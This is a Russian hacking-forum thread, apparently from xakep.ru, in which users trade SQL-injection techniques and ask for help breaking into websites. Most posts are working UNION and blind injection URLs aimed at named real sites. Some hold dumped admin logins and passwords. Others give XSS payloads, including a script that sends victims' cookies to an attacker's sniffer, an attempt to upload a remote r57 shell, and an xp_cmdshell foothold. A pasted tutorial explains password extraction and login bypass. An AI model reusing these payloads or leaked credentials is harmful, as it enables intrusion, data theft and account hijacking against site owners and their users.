Реальный путь к серверу %s
Возможно получение реального пути к веб-серверу с помощью запроса:
http://www.сайт.сом/last.php?auction='
И еще нашел
http://www.сайт.сом/admin/?q=' при таком запросе выдает
ERROR: Undefined query id
GET:Array
(
[q] => '
)
POST:Array
(
)
SESSION:Array
(
)
получается что можно использовать скрипты
Как можно добыть доступ к серверу или утянуть админский пароль?
Спасибо всем за ответы
Скажи сайтик, посмотрю)
?id=-1+union+select+1,COLUMN_NAME,3+FROM+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=COLLATIONS+/*
ошибка:
Unknown column 'COLLATIONS' in 'where clause'
прочему это COLLATIONS - поле и откуда взялась таблица "где предложение", или я запрос не верно составил?
п.с. табличка такая есть, мускул > 5.0.0 => INFORMATION_SCHEMA.COLUMNS должно работать
[:D] COLLATIONS в одинарные кавычки возьми и плюс последний убери перед/* или поставь "+limit+0,1"
попробуй 'COLLATIONS' (вместе с кавычками) заменить на 0x434F4C4C4154494F4E53
И потом что ты решил найти в COLLATIONS? Что, поинтересней табличек нет?
народ помогите начинающему
[link=http://rabota.slando.com.ua/search/?category_id=830&search_terms=&type=1&page_no=1+from+seo_info,posting_category,site,site_section,category_template+where+1=-1+union+select+1,2,3,4,5,6,7,8,9--]http://rabota.slando.com.ua/search/?category_id=830&search_terms=&type=1&page_no=1+from+seo_info,posting_category,site,site_section,category_template+where+1=-1+union+select+1,2,3,4,5,6,7,8,9--[/link]
немогу с етим ничего сделать :(
внизу топик )
ты лучше скажи - с COLLATIONS прокатило?
Пашкелла, вы ещё тут? тогда рискну спросить )
+есть запрос вида:
[b]?id=-1+union+select+1,COLUMN_NAME,3+FROM+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=0x27%0x27/*
[/b]выдаёт все поля всех таблиц
-но попытка просмотра полей для конкретной таблицы, а именно:
[b]?id=-1+union+select+1,COLUMN_NAME,3+from+information_scheme.columns+where+table_name=cns_todayCHAR(39)+limit+1,2/*[/b]
говорит мне что типа прав недостаточно:
[b]SELECT command denied to user '6847'@'localhost' for table 'columns'[/b]
? - как такое может быть что доступа к information_schema.columns одновременно и есть и нету
какое имя таблицы
[b]'cns_today'[/b]
[b]?id=-1+union+select+1,COLUMN_NAME,3+from+information_scheme.columns+where+table_name=0x636e735f746f646179/*[/b]
Попробуй такой запрос
идентично =(
может попробуешь? а мне расскажешь потом в чём дело )
Дафай сцыль в пм
всё, вопрос не актуален =)
Пробую изучать sql уязвимости. Взял сайт, нашел параметр который подвержен уязвимости. При подстановке ' выдает:
=======
http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=0'
=======
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/webmaster/public_html/kb-fr/listprod.php on line 119
=======
Я понимаю так, что установлен MySQL. Пытаюсь подобрать количество столбцов - ничего не получается (хотя по мануалам все вроде понятно (может чего не знаю?)). Что пробовал:
1. вручную подбирал столбцы (достало): ct=0'+union+select+1,2,3,4,5,6,7/* и т.д. Постоянно выдает ошибку
2. через order by (прогнал до 1) - ct=0'+order+by+9/* постоянно выдает ошибку (получается что нет ни одного столбца. Такое может быть? Могу предположить только что я что-то не знаю, упустил. Можно конечно искать и другие уязвимости или пути решения конечной цели, а они наверняка там будут, далее развить инъекцию и решить поставленую задачу, но просто хотелось бы разобраться с данным параметром чтобы понять в чем дело - почему не получается выяснить количество столбцов? (для меня это более важно))
3. думал может MySQL 5.0.51 пробовал вместо /* ставить -- все равно просто тупо выводится ошибка.
4. делаю подборы через firefox с плагином hackbar v1.3.2 (может он глючный? (попробую еще через адресную строку))
5. известно что на машине есть: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6 mod_ssl/2.2.3 OpenSSL/0.9.8c
Вдогонку. Проверил значения ct=1 и ct=1-1 результат одинаков. Значит, я так понимаю, параметр фильтруется (и нужно рыть в этом направлении)?
3 поля там, 1-ое рабочее
а рыть надо в направлении того , что Database Version: 5.0.32
ещё 1 подсказка
http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=-1/**/UNION/**/SELECT/**/TABLE_NAME,2,3/**/from/**/information_schema.tables+limit+2,1/*
и т.д.
=)
гы а он походу уснул за взломом =(
Поможем еще раз:)
http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=-1/**/UNION/**/SELECT/**/version(),2,3/**/limit/**/1,1/*
плюс XSS:
[link=http://http://www.kelbike.fr/search.php?merchantid=118&brand=AVID&ps=%22%3E%3Csсriрt%3Ealert%28%27Pashkela%27%29%3C%2Fsсriрt%3E%3C%22&po=&pv=&ls=1&pmin=3&pmax=40]XSS[/link]
ладно, последняя подсказка )
http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=-1/**/UNION/**/SELECT/**/concat_ws(0x3c3d3e,user_id,user_pwd,user_pseudo),2,3/**/from/**/dc_user/**/limit/**/1,1/*
не проверял на актуальность результат, думаю это право за ТС =)
[link=http://forum.xakep.ru/showProfile.aspx?memid=84349]stone pilot[/link],
ах да , забыл
а проще http://pashkela.narod.ru/progi/MySQL_column.rar, и мозг не надо парить в 90% случаев[:)]
неа, он только на limit 1,1 настроен и без него, там, где SQL допустим с limit 0,1 - SIPT отдыхает. Так что моя тулза круче (в плане подбора кол-ва колонок)[:)]
Ну и что, всё равно моя круче[sm=ag.gif][sm=ag.gif][sm=ag.gif][sm=ag.gif][sm=ag.gif]
Ответ на многие вопросы здесь
http://na-s.ru/pictures/xak8.jpg
кто -мож скажет здесь что можно сделать
http://dwap.tj/top/config.php
подскажите правельно я тут произвожу заливку шелла
http://dwap.tj/forum/reg.php?mod=reg&PHPSESSID=b3eff4059e9eb61409ed87ae031456b9?login=$(login)&pass=$(pass)&ppass=$(ppass)&sex=$(sex)&psw=$(psw)&&wap=xml&/dwap.tj/forum/reg.php&ink?link=http://room-escape-games.com/r57.txtl
Выскочило вот это
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /space/home/svlasov/rudtp/faq.php on line 119
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /space/home/svlasov/rudtp/faq.php on line 124
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /space/home/svlasov/rudtp/faq.php on line 125
Является ли это подтверждением того что на сайте есть уязвимость????
А также нашел уязвимость на сайте http://www.mtas.ru/second.php?ID=-243+union+select+1/* но незнаю как узнать имена таблиц и полей......
[link=http://forum.xakep.ru/showProfile.aspx?memid=54997]Jarull[/link]
titleAndStar(243,11,false,false,"","")Демиург
http://www.mtas.ru/second.php?ID=-243+union+select+AES_DECRYPT(AES_ENCRYPT(user(),%20%200x71),0x71)/*
http://www.mtas.ru/second.php?ID=-243+union+select+AES_DECRYPT(AES_ENCRYPT(version(),%20%200x71),0x71)/*
Данные по полям vcLogin,vcPassword из таблицы tadmins:
-------
mdim:mdim
novikov:nov
ppc:ppc
super:super
vital:vital
123:123
[b]Вот сайт - http://www.funplusfun.com
С помощью SQL-инъекции узнал логин и пароль админа.. А вот ту самую "одминку" найти не могу.. Перебрал кучу директорий:
/admin/
/adm/
/administrator/
/administrators/
/admistration/
/login/
Везде стр.404 =(
Помогите, может кто-нить найдёт...[/b]
Тэкс... узнал, что это 5-ая версия мускула... Вот теперь мне интересно, как выдрать имена таблиц и сопоставленных к ним столбцов... Через +limit 1,0 долгая история.. А нельзя ли как-нить весь список за раз выдрать?
http://www.bestonlinevalue.com/upgrade.php?ucat=-1086%20union%20all%20select%201,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,%2022,23,24,25,26,27,28,29,30,31,32,33,34,35--
P.S. Мож у кого есть линки на маны по инъекции в 5-ый мускул? Надо почитать.. Только не посылайте в гугл.. уже ищу. Но может быть у вас есть что-то более интересное =)
http://www.bestonlinevalue.com/upgrade.php?ucat=-1086/**/union/**/select/**/1,22,23,24,column_name,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/**/from/**/information_schema.columns+where+table_name=0x70617970616C5F636172745F696E666F+limit+0,1--
http://www.bestonlinevalue.com/upgrade.php?ucat=-1086/**/union/**/select/**/1,22,23,24,column_name,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/**/from/**/information_schema.columns+where+table_name=0x69675F61646D696E+limit+0,1--
Список таблиц из information_schema:
-------
1:CHARACTER_SETS
2:COLLATIONS
3:COLLATION_CHARACTER_SET_APPLICABILITY
4:COLUMNS
5:COLUMN_PRIVILEGES
6:KEY_COLUMN_USAGE
7:PROFILING
8:ROUTINES
9:SCHEMATA
10:SCHEMA_PRIVILEGES
11:STATISTICS
12:TABLES
13:TABLE_CONSTRAINTS
14:TABLE_PRIVILEGES
15:TRIGGERS
16:USER_PRIVILEGES
17:VIEWS
18:about
19:adsense
20:captcha
21:categorylisting
22:confset
23:country
24:currency
25:do_ban
26:field_config
27:google_cse
28:ig_admin
29:ip_ban
30:language
31:linknumber
32:main
33:meta
34:paypal_cart_info
35:paypal_payment_info
36:paypal_subsсriрtion_info
37:template
38:terms
39:welcome
40:word_b
http://pashkela.narod.ru/progi/MySQL5tool.rar
нет, только таблицы и только в такого вида запросах, где есть "where+table_name=", а как:
http://pashkela.narod.ru/progi/Text2HEX.rar
Объясните пожалуйста почему:
запросы вида &ct=0/**/union/**/select/**/TABLE_SCHEMA,2,3/**/from/**/INFORMATION_SCHEMA.tables/**/limit/**/1,1/*
&ct=0/**/union/**/select/**/TABLE_SCHEMA,2,3/**/from/**/INFORMATION_SCHEMA.COLUMNS/**/limit/**/1,1/*
не показывают мне базы даных (limit увеличиваю 2,1 и т.д.). Показывает только одну INFORMATION_SCHEMA.
Другие базы данных там есть и имена мне их известны. Мне не нужно в данном вопросе знать другие пути получения имени баз. Мне нужно знать ПОЧЕМУ не хотят отрабатывать первых два запроса. Ведь вроде все верно написано и другие базы там есть и служебную отбразило. А дальше почему затор?
Ссылку в студию, не надо жадничать
http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=0/**/union/**/select/**/TABLE_NAME,2,3/**/from/**/INFORMATION_SCHEMA.tables/**/limit/**/1,1/*
TABLE_NAME, а не TABLE_SCHEMA
какие еще имена баз данных??? База данных только одна, с которой ты работаешь в данный момент. Одна INFORMATION_SCHEMA = Одна база. А если ты хочешь узнать имя этой базы, то:
http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=0/**/union/**/select/**/DATABASE(),2,3/**/from/**/INFORMATION_SCHEMA.tables/**/limit/**/1,1/*
PS: База состоит из таблиц, таблицы из полей
Блин, совсем мозги запудрил:
1. У меня там небольшая ошибка, правильный запрос:
http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=0/**/union/**/select/**/DATABASE(),2,3/**/limit/**/1,1/*
"webmaster:kelbike" - это и есть название базы, просто чувак так обозвал (двоеточие входит в название базы)
2. Дальше вместо DATABASE() можешь подставлять VERSION() и USER()
3. Т.к. версия больше 5, то мы можем вытащить инфо из быза "webmaster:kelbike" посредством INFORMATION_SCHEMA следующими запросами:
http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=0/**/union/**/select/**/TABLE_NAME,2,3/**/from/**/INFORMATION_SCHEMA.tables/**/limit/**/1,1/*
можно посмотреть все ТАБЛИЦЫ в базе "webmaster:kelbike", и только в ней
после того, как мы нашли ту ТАБЛИЦУ, откуда хотим получить информацию, узнаем КОЛОНКИ из этой таблицы:
http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=0/**/union/**/select/**/COLUMN_NAME,2,3/**/from/**/INFORMATION_SCHEMA.columns/**/where/**/table_name='ИМЯ_ИНТЕРЕСУЮЩЕЙ_ТАБЛИЦЫ'/**/limit/**/1,1/*
Могут быть всякие нюансы, кавычки фильтроваться и всё такое, тогда шифруешь имя таблицы в HEX в формате 0х... и получаешь нужный результат.Это раз. Таблица может иметь префикс, отличный от имени основной базы. Это два. Вот чтобы узнать этот префикс, понадобиться твоя TABLE_SCHEMA:
http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=0/**/union/**/select/**/TABLE_SCHEMA,2,3/**/from/**/INFORMATION_SCHEMA.columns/**/where/**/table_name='ИМЯ_ИНТЕРЕСУЮЩЕЙ_ТАБЛИЦЫ'/**/limit/**/1,1/*
Тогда уже конечный запрос (если имена колонок обычным способом не показались и требуется префикс (обычно в таких случаях вылезает ошибка "Нету такой таблицы - ХОСТ.ТАБЛИЦА")), будет выглядеть так:
http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=0/**/union/**/select/**/COLUMN_NAME,2,3/**/from/**/INFORMATION_SCHEMA.columns/**/where/**/table_name='НАЙДЕННЫЙ_ПРЕФИКС.ИМЯ_ИНТЕРЕСУЮЩЕЙ_ТАБЛИЦЫ'/**/limit/**/1,1/*
4. Дальше уже вытаскиваем информацию из найденных КОЛОНОК интересующей ТАБЛИЦЫ:
http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=0/**/union/**/select/**/ИМЯ_НАЙДЕННОЙ_КОЛОНКИ,2,3/**/from/**/ИМЯ_ИНТЕРЕСУЮЩЕЙ_ТАБЛИЦЫ/**/limit/**/1,1/*
меняя в limit первую "1" в сторону увеличения (гы), можно просмотреть всю информацию
Иногда встречаются ошибки, когда пишет про какое-то несовпадение кодировок (хотя всё вроде сделали правильно), а может и не писать, тогда то, что хочешь вывести на экран (начиная от VERSION() и заканчивая содержимом КОЛОНОК) надо в нашем запросе заключить в UNHEX(HEX(предмет_поиска)) и всё будет чудненько.
=================================================
И всё, так, только так и еще раз так. На остальное плюнь и забудь. А версии MySQL<5 лечишь SIPT4 (программа такая). Есть еще MSSQL - но там всё по-другому.
ЗЫЖ Двоеточие на экране как разделитель может появиться только в том случае, если ты вставишь соотвествующий разделитель в свой запрос, например
concat_ws([b]0x3a[/b],VERSION(),DATABASE(),USER())
тогда версия, имя и юзер будут через ":" написаны
больше нечего добавить, основы описаны замечательно) +2
Да не согласная я :). Что ж, в споре рождается истина. Буду мучать вас дальше и задавать глупые вопросы. Кое с чем я соглашусь, так как вроде на мой взгляд верно получается и я не вижу противоречий (не возникает у меня встречных вопросов). В частности это касается вопроса о webmaster:kelbike.
Надоел, схоластик несчастный. Иди лучше сломай что-нибудь
http://search.uaclub.net.ua/?query=12' помогите с инэкцией. Плыз.
[>:] Чайник ты brtn! Раз не знаеш - молчал бы! А знаеш - так помоги лутше, чем ссылками кормить! [:@]
нет SQL-inj. С виду есть, но принтабельных полей нет. Так что и SQL-inj фактически нет. Похоже на подставу
хз де там скуль иньект
но xss оно точно страдает:
http://search.uaclub.net.ua/?query=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
Вопрос.
Когда делаю запрос вида:
[code]?id=1+union+select+MD5(123456),1[/code]то MD5 считается нормально, но при добавлении ковычек:
[code]?id=1+union+select+MD5('123456'),1[/code]хэш строки не считается, выдаётся пресловутая ошибка:
2 [b]S00pY
[/b]После своего вопроса начал искать другие способы и мне тоже пришла идея перегнать строку с помощью bin2hex. [b]S00pY[/b], спасибо за подсказку, но бой не окончен :)
Вот такой вариант прокатывает и выводит хэш строки:
[code]?id=-99999+union+select+md5(0x79616e6973),null[/code], а[code]?id=-99999+union+select+if(load_file(0x2f7661722f7777772f3c6375743e2e706870)=null,1,2),null[/code]выводит 2, т.е. load_file работает, но на экран содержимое файла не выводится.
Как бы (прочитать ) вывести его содержимое?
Может быть можно как-нибдь создать копию файла с другим расширением и скачать его?
Есть, если есть директория с авами, то там соответствующие права выставлены. Туда можно. В общем любую доступную для загрузки
[b]2 Pashkela
[/b]Спасибо. А что такое «директория с авами»? [8|]
[b]
[/b]
Если допустим есть форум, то ты можешь устанавливать себе любую аву, какую хочешь, вот тогда-то и тогда
Ребят не совсем по теме но у меня проблема с XSS нашол громадную дыру но как ее использовать не знаю
в крации могу выполнить в поиске любой ява скрипт проблема в том что с явой не особо дружу
снифер используй
Ээээээ пробле в том что я ламер в данном вопросе можно по подробнее
что вообще можно использовать и как снифать
Вставь туда:
<sсriрt>window.location.href='http://ТВОЙ_САЙТ/ДИРЕКТОРИЯ_СНИФАКА/s.gif?'+document.cookie;</sсriрt>
а где взять код снифера и как его настроить - гугли
Если разберешься и сделаешь - тебе прилетят куки того, кому ты такую ссылку дашь и если он по ней тыцкнет (куки с того ресурса, где XSS). Подставляешь в браузер, F5 - и ты становишься тем, чьи куки. Вывод - взлом:)
так это понятно что снифер стырит кукесы а может можно еще что то дельное зделать так сказать более эфективное
ничего ты больше не сделаешь. XSS=снифануть куки. Ну можешь еще вставить туда алерт "Я самый крутой хакер, мой провайдер kubtelecom" или просто перенаправить на другой ресурс
ЗЫЖ Стырить куки - это не эффективно? Хм.
спасибо большое буду смотреть что с этим можно зделать накачал статеек на выходных будит чем занятся.
Кто поможет составить SQL запрос к бд?нужно в одной колонке исправить значение
бд RF_User таблица tbl_StaffAccount
колонки :Serial ID PW Grade Depart RealName LastConnIP CreateDT LastLoginDT LastLogoffDT TotalLogMin SubGrade ExpireDT ComClass BirthDay.
В колонке "Grade"надо сменить число(там стоит 2,нужно 4)
если всё оперативненько то оплочу работу
http://www.sql.ru/forum/actualtopics.aspx?bid=1&p=1
столкнулся с проблемой при попытке подобрать кол-во полей:
newsid=123+order+by+1/* - все норм
newsid=123+order+by+2/* - unknown column '2' in 'order clause'
при newsid=123+union+select+1/* вылазит 'select' statement have different number of fields (или как-то так=))
попытки подобрать поля через union+select ни к чему не приводят
поиск юзал, ниче полезного не нашел ((
ссылку дай, если секрет - то в ПМ
http://ioo-mgou.ru/index.php?area=1&p=gallery&action=showimages&galid=51+order+by+2/*
ничего ты там не сделаешь, там админ не лох
http://ioo-mgou.ru/index.php?area=1&p=gallery&action=showimages&galid=51+order+by+id/*
[size="4"][font="arial"]Люди кто нибудь поскажите пожалуйста у меня такая проблемка, я установила Nero 7 и когда попробовала записать диск запись прошла успешно но когда я поставила в двд плеер у меня записаное пошло только окло 20 минут а потом начал тормозить и вообще остановился я переустановила Nero 8 и такаяже самая проблема подскажите пожалуйста в чём может быть проблемма. Заранее спасибо.[:(][/font][/size]
Ситуация такая:
Есть дермовенький шелл на виндовом веб-сервере через SQL-Inj вида:
[code]http://somesite.com/?someparam=222' OR 1=1;exec master..xp_cmdshell "CMD";--[/code]
Там IIS, MsSQL и неизвестная не русская винда. Вывода комманд нет. Поначалу пришла в голову бредовая идея, создать ftp сценарий, а потом его запустить на скачку нормального шелла и запустить. Но что-то как-то не срослось. Есть идеи?
Теперь родилась идея побайтово записать в .exe/.com простенький шеллкод. Но можно ли сделать его без непечатаемых символов?
http://www.heimlichinstitute.org/page.php?id=-34+union+select+1,unhex(hex(version())),unhex(hex(user())),4/*
Я ещё новичок в этом деле. Что дальше?
http://xakzone.net/articles_view.php?art=blabla' кому нужно, тот доделает)))
[b][ZorGuS][/b], топик создан для решения проблем, связанных с SQL-инъекциями. Здесь не нужно скидывать найденные уязвимости.
2 oRb:
А куда нужно? Доколе?[:)]
[link=http://shop.vira.ru/search-blabla']http://shop.vira.ru/search-blabla'[/link]
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/v1922.vps.masterhost.ru/subdomains/shop/httpdocs/library/search.php on line 141
По вашему запросу ничего не найдено. - хех, а дальше чего?
[b]LolLolLolHahaha[/b], ты дал недостаточно информации, чтоб тебе ответили. Опиши, что ты сделал, и какой конечный результат ты приследуешь.
UPD: Да там весь сайт в SQL-инъекциях. Делай что хочешь :D
Извините за откровенно ламерский вопрос.
Я перелопатил уже много инфы по SQL-inj, но нигде не смог найти толкового, вразумительного объяснения для чего в инжектах используют aes_decrypt/aes_encrypt.
Разъясните подробно, пожалуйста!
Заранее благодарю.
Более универсально unhex(hex(тут например version()))
Из за несовпадение кодировок, цифры на экран выводятся, т.к., слава богу, во всем мире таки приняли за дефолт арабские цифры (кстати, интересно, почему), а инфо может и не выводится, вывод:
[b]unhex(hex(инфа, которая тебе нужна))[/b]
т.е. сначала переводишь в HEX ту инфу, которую хочешь дернуть, а потом делаешь уже UNHEX, что приводит её в читабельный вид в соответствии с языковыми стандартами. Т.е. в данном случае HEX - это перекодирование того, что ты хочешь узреть в ДЕФОЛТНЫЙ стандарт, который понимают все браузеры и БД, независимо от версии и страны
что-то я не понимаю в чём проблемма, но никак не могу раскрутить shop.vira.ru/search-blabla', у кого получилось напишите плз какой-нить свой удачный запрос [sm=bu.gif]
Большое спасибо за инфу Pashkela![;)]
Кто-нибудь подскажите.
Я читал много примеров, в которых при переборе символов в слепых инъектах с задержкой по времени (не беру в расчет "Subquery returns more that 1 row", и т.д.) используют benchmark(), который на несколько секунд опускает сервер в даун.
Почему никто не использует вместо него sleep(), который никого не напрягая приостанавливает выполнение запроса.
Или может не так все просто?
З.Ы. Речь веду о мускуле.
Тк функция SLEEP() была добавлена начиная с версии 5.0.12
Я начал ковырять один сайт, но базу данных там видимо ставили еще динозавры.
UNION не работает, подзапросы не работают (я проверил, это не фильтрация, они просто не работают. Например id=1/*UNION работает).
Работает только ORDER BY и GROUP BY.
Получается если это мускул, то версия ниже 4.0.[:(]
Подскажите, пожалуйста, реально ли что-нибудь извлечь из этой ветоши?
Заранее благодарен.
Возможно слово юнион просто вырезается
Слепым перебором мне удалось вытащить, что это MySQL 3.23.
Чё с ним делать ума не приложу.
SIPT 4.0
А если мне интересно ручками инжекты ковырять?[:)]
Прогами - это неспортивно.
Брутить ручками? Ню-ню
Так что именно брутить, если ни UNION ни подзапросы не работают?
Допустим database() и user(), но что мне это даст?
Union была введена начиная с 4-ой версии
вот пока почитай:
http://www.xakep.ru/magazine/xa/111/056/1.asp
Я эту статью читал сто раз.
Какое она имеет отношение к такому мамонту, как MySQL 3.23?
[code]
MySQL v3.x Injection
INTRO
Почему я решил о ней тебе рассказать? Потому что, если ты читал статью Константина, ты знаешь, что есть оператор объединения UNION (а если не читал и не знаешь-то исправь сие недоразумение =) ). Но есть одно НО: в третьей версии мускла его не существует! Т.е. как бы ты ни пытался вводить запросы типа:
http://victim.com/news.php?id=1+UNION+SELECT+*+from+mysql.user/*
то скрипт тебя упорно будет посылать (нет, не туда, куда ты подумал =)) на страницу с ошибкой. Что же делать - спросишь ты, - Ведь злонамеренный запрос не исполнится, а значит я не получу заветную базу данных в мою коллекцию?! Нет, - скажу я. Есть такое понятие как дихотомический поиск. Под этим страшным названием скрывается довольно обычная вещь - запросы перебора. Что это такое? Например, ты хочешь узнать версию мускла. В обычных условиях ты выполнишь UNION-оператор с запросом типа UNION+SELECT+VERSION() в самом простом раскладе, но такая тема тут не прокатит.
Код:
http://victim.com/news.php?id=1+and+ascii(lower(substring(Version(), 1,1)))<82
http://victim.com/news.php?id=1+and+ascii(lower(substring(Version(), 1,1)))<60
http://victim.com/news.php?id=1+and+ascii(lower(substring(Version(), 1,1)))>49
http://victim.com/news.php?id=1+and+ascii(lower(substring(Version(),1,1)))=55
При таком запросе возможно выведение версии БД. Давай рассмотрим запрос поближе:
--> Функция ascii(ch) возвращает ascii-код символов ”ch”, переданных в качестве параметра.
--> Функция substring(str, num, count) возвращает символы из строки ”str” с номера символа ”num” по количество символов ”count”. Далее все выражение сравнивается с кодом символа.
После того, как ты найдешь правильный символ, страница будет выведена без ошибки.
Допустим, надо проверить доступ твоего юзера к mysql.user:
Код:
http://victim.com/news.php?id=1+and+ascii(lower(substring((SELECT+pa ssword+FROM+mysql.user),1,1)))>0[/b]
Если сценарий ничего полезного не вернул, то прав у тебя на БД нет.
Tricks
Если идет какая та фильтрация, если ты не можешь узнать что-то, это не повод расстраиваться! Существуют некоторые полезные вещи, которые ты можешь использовать:
Пройти авторизацию при недостаточной фильтрации:
Код:
http://victim.com/admin.php?pass=test'+or+1/*
http://victim.com/admin.php?pass=test'+and+1/*
Таким образом, проверяя скрипт, можно пройти авторизацию, не зная пароля.
Также с помощью limit можно пройти авторизацию за любого клиента БД.
Подсчет количества полей также используется с limit-параметром:
Код:
http://victim.com/admin.php?pass=test'+or+1+limit+10,1/*
http://victim.com/admin.php?pass=test'+or+1+limit+6,1/*
http://victim.com/admin.php?pass=test'+or+1+limit+5,1/*
http://victim.com/admin.php?pass=test'+or+1+limit+3,1/*
Последний и предпоследний запросы не возвратили ошибку, следовательно, количество полей - 5.
Также хакер может получить имена столбцов, перебором таблиц в булевых запросах:
Код:
http://victim.com/admin.php?pass=test'+or+1/*
http://victim.com/admin.php?pass=test'+or+name=name/*
http://victim.com/admin.php?pass=test'+or+password=password/*
http://victim.com/admin.php?pass=test'+or+pass=pass/*
Запрос без ошибки покажет, что данный столбец существует.
Иногда при наличии двух и более таблиц, понадобится кроме имени столбца указать еще им или псевдоним таблицы:
Код:
http://victim.com/admin.php?pass=test'+or+1/*
http://victim.com/admin.php?pass=test'+or+passwords.name=passwords.name/*
http://victim.com/admin.php?pass=test'+or+passwords.login=passwords.login/*
http://victim.com/admin.php?pass=test'+or+passwords.password=passwords.password/*
http://victim.com/admin.php?pass=test'+or+passwords.pass=passwords.pass/*
Опять таки, при отсутствии ошибок, данные существуют.
Для последовательного подбора символов пароля можно сделать так:
Код:
http://victim.com/admin.php?pass=test'+or+pass+like+'a%'/*
http://victim.com/admin.php?pass=test'+or+pass+like+'b%'/*
...
http://victim.com/admin.php?pass=test'+or+pass+like+'h%'/*
Последний запрос не вывел ошибку, следовательно, у пользователя helkern_admin пароль начинается с буквы ”h”. Точно также подбираются остальные символы:
Код:
http://victim.com/admin.php?pass=test'+or+pass+like+'ha%'/*
…
http://victim.com/admin.php?pass=test'+or+pass+like+'hacked%'/*
http://victim.com/admin.php?pass=test'+or+pass+like+'hacked_%00'/*
Последний запрос вызвал ошибку, что в доступе отказано. Следовательно, пароль админа helkern'а будет hacked.
Аналогичным образом можно вместо оператора like (допустим при фильтрации сего) использовать операторы сравнения:
Код:
http://victim.com/admin.php?pass=test'+or+pass+>+'r'/*
..
http://victim.com/admin.php?pass=test'+or+pass+>+'z'/*
Ошибка! Значит, пароль начнется с ”z”. Также подбираем остальные символы.
Подбор пароля происходит таким же образом.
Что если у тебя заказ на какого то конкретного юзверя Васю, а не на великого админа helkern'а? ( сильно не пинайте за мою любовь к себе. тихо сам с собою, левою рукою =) ). Можно конечно поиметь пароль админа, но настоящие хеки делают все честно - подбирают пароль юзера Васи следующим образом:
Код:
http://victim.com/admin.php?pass=test'+or+pass+like+'o%'+and+login=' вася'/*
http://victim.com/admin.php?pass=test'+or+pass+like+'on%'+and+login= 'вася'/*
...
http://victim.com/admin.php?pass=test'+or+pass+like+'onanist_%'+and+ login='вася'/*
В последнем запросе выдалась ошибка, значит, пароль юзера васи будет onanist. "Кто что хочет, то и дрочит (c) rijy =) ".
Также есть еще один интересный способ узнать версию БД:
Код:
http://victim.com/news.php?id=1+/*!00000+and+0+*/
http://victim.com/news.php?id=1+/*!30000+and+0+*/
http://victim.com/news.php?id=1+/*!40000+and+0+*/
http://victim.com/news.php?id=1+/*!50000+and+0+*/
Допустим, появилось сообщение во втором запросе, что записи не найдены. Это значит, что версия равна как минимум 3.0. Сообщение об ошибке в 3 запросе свидетельствует о сервере версии 4.0.
Используем дихотомический поиск:
Код:
http://victim.com/news.php?id=1+/*!00000+and+0+*/
записи не найдены
http://victim.com/news.php?id=1+/*!20000+and+0+*/
записи не найдены
http://victim.com/news.php?id=1+/*!30000+and+0+*/
записи не найдены
http://victim.com/news.php?id=1+/*!40000+and+0+*/
какое то значение => Сервер имеет БД типа 3.x
http://victim.com/news.php?id=1+/*!32000+and+0+*/
записи не найдены
http://victim.com/news.php?id=1+/*!33000+and+0+*/
какое то значение => Сервер имеет БД типа 3.2x.xx
http://victim.com/news.php?id=1+/*!32500+and+0+*/
какое то значение
Версия меньше 3.25.00
http://victim.com/news.php?id=1+/*!32300+and+0+*/
записи не найдены
Версия больше 3.23.00
http://victim.com/news.php?id=1+/*!32400+and+0+*/
какое то значение версия вида 3.23.xx[
http://victim.com/news.php?id=1+/*!323350+and+0+*/
какое то занчение == Версия меньше 3.23.50
http://victim.com/news.php?id=1+/*!32330+and+0+*/
записи не найдены == Версия вида 3.23.4x[
http://victim.com/news.php?id=1+/*!32345+and+0+*/
какое то значение == Версия меньше 3.23.45
http://victim.com/news.php?id=1+/*!32343+and+0+*/
записи не найдены == 3.23.43
http://victim.com/news.php?id=1+/*!32344+and+0+*/
какое то значение
Версия БД равна 3.23.45. Так что такой поиск аналогичен функции version().
OUTRO
На этом мы закончили вводный курс в дихотомический поиск или "Fuck The MySQL 3.x". Теперь ты достаточно знаешь, чтобы хвалиться перед друзьями собранными акками с крутых порталов =) Удачи тебе, перец!
(c) Helkern
[/code]
+ вот:
http://www.securitylab.ru/contest/212101.php
+ вот:
http://forum.antichat.ru/threadnav37037-3-10-blind+sql.html
+ вот:
http://forum.antichat.ru/thread84949-blind+sql.html
+вот:
https://forum.antichat.ru/threadnav43966-1-10.html
+ вот:
http://forum.antichat.ru/thread56221-blind+sql.html
Спасибо большое (+2) Pashkela!
Подскажите пожалуйста.
Допустим на некотором сайте выполняется запрос:
